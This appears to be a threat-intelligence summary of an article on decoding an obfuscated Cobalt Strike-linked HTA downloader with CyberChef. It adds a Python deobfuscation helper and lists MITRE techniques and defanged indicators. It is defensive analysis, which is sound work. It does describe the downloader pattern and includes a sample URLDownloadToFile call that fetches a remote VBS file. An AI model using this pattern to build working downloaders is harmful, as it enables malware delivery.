This article walks through decoding a .HTA downloader script linked to the Cobalt Strike toolkit, showing how simple obfuscation (Base64URL encoding and excessive spacing) can be reversed with CyberChef. The decoded script is a downloader that fetches a next-stage VBS file from a remote server, illustrating a practical reverse-engineering workflow.
Keypoints
- The .HTA script is found on Malware Bazaar and is linked to the Cobalt Strike toolkit.
- Basic obfuscation techniques include Base64URL encoding and excessive spacing.
- CyberChef is used to decode the URL-encoded content across multiple layers.
- Regular expressions are applied to remove excessive whitespace for readability.
- Decoded content reveals a downloader function that uses URLDownloadToFile.
- The next-stage file is identified as http://198.46[.]178.144/morningfiledatinglover[.]vbs.
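The CyberChef workflow summarized in the keypoints, reimplemented as an added Python helper (not code from the article or its author): peel the URL-encoding layers, strip the excess whitespace with a regex, Base64URL-decode the result, and pull the URLDownloadToFile target out of the recovered script. The obfuscated sample is constructed inline; its URL and file names are placeholders, not the article's indicators.

```python
import base64
import re
from urllib.parse import quote, unquote

# Constructed sample: an inert one-line VBScript call, Base64URL-encoded, padded with
# excessive spacing and then URL-encoded twice. The URL and path are placeholders.
INNER_VBS = 'URLDownloadToFile 0, "http://example.invalid/next-stage.vbs", "stage.vbs", 0, 0'

def build_sample(inner=INNER_VBS):
    blob = base64.urlsafe_b64encode(inner.encode()).decode().rstrip("=")
    spaced = "   ".join(blob[i:i + 8] for i in range(0, len(blob), 8))  # scatter whitespace
    return quote(quote(spaced, safe=""), safe="")  # two URL-encoding layers

def strip_url_layers(data, max_layers=10):
    """Repeat URL-decoding until the text stops changing; returns (text, layer count)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(data)
        if decoded == data:
            break
        data, layers = decoded, layers + 1
    return data, layers

def collapse_whitespace(text):
    """Regex pass that strips the excessive whitespace (the CyberChef regex step)."""
    return re.sub(r"\s+", "", text)

def base64url_decode(token):
    """Base64URL decode with any stripped '=' padding restored."""
    padded = token + "=" * (-len(token) % 4)
    return base64.urlsafe_b64decode(padded).decode("utf-8", errors="replace")

# Matches URLDownloadToFile <handle>, "<url>", "<local path>" with or without parentheses.
DOWNLOAD_RE = re.compile(r'URLDownloadToFile\s*\(?\s*\w+\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"', re.I)

def extract_downloads(script):
    """Return (url, local path) pairs, the triage output an analyst wants from the script."""
    return DOWNLOAD_RE.findall(script)

def deobfuscate(sample):
    text, layers = strip_url_layers(sample)
    script = base64url_decode(collapse_whitespace(text))
    return {"url_layers": layers, "script": script, "downloads": extract_downloads(script)}

if __name__ == "__main__":
    result = deobfuscate(build_sample())
    print(f'{result["url_layers"]} URL-encoding layers removed\n{result["script"]}')
    for url, path in result["downloads"]:
        print("downloader target:", url, "->", path)
```

The extracted URL and local path are what to feed into blocklists and hunting queries; `strip_url_layers` stops on its own once decoding no longer changes the text, so it handles one, two or more encoding layers without being told the count.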
MITRE Techniques
- [T1071] Command and Control: use of HTTP for command and control communication.
- [T1001] Data Obfuscation: use of encoding techniques like Base64 and URL encoding to obfuscate data.
- [T1105] Remote File Copy: downloading files from a remote server using URLDownloadToFile.
Indicators of Compromise
- [IP] next-stage host: 198.46[.]178.144 (observed as the destination for the next-stage file)
- [URL] downloader URL: http://198.46[.]178.144/morningfiledatinglover[.]vbs
- [File hash] sample hash: 2807199adde4730e5e89c5f0ed3d48380dac746a44fa1e5fe0ca0186743a97e0
- [File name] next-stage file: morningfiledatinglover.vbs
- [Domain] hosting domain: bazaar.abuse.ch (Malware Bazaar sample source)
Read more: https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/